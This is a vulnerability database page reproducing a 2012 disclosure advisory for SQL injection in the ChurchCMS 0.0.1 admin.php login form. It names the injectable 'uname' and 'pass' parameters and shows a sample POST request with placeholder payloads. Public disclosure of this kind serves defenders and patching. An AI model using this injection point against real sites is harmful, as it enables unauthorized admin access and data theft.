Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27994
HistoryApr 24, 2012 - 12:00 a.m.

ChurchCMS 0.0.1 'admin.php' Multiple SQLi

2012-04-2400:00:00
vulners.com
20
JSON

Exploit Title: ChurchCMS 0.0.1 'admin.php' Multiple SQLi

Date: 04/21/12

Author: G13

Twitter: @g13net

Software Link: http://sourceforge.net/projects/churchcms/?source=directory

Version: 0.0.1

Category: webapps (php)

Description

ChurchCMS is the software to place on your church's website that is
easily managed, self-intuitive, yet expandable via our module library.
Included features are: announcements, calendar, prayer requests
manager, and help wanted manager.

Vulnerability

The admin.php page has multiple SQL injection vulnerabilities. Both
the 'uname' and 'pass' parameters are vulnerable to SQL Injection.

The vulnerability exists via the POST method.

Exploit

POST http://localhost/churchcms/admin.php?op=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)
Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://localhost/churchcms/index.php
Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17
Content-Type: application/x-www-form-urlencoded
Content-length: 40
uname=[SQLi]&pass=[SQLi]

Vendor Notification

04/21/12 - Vendor notified

Per my disclosure policy, advisory is released.

http://www.g13net.com/vuln-disc.txt

JSON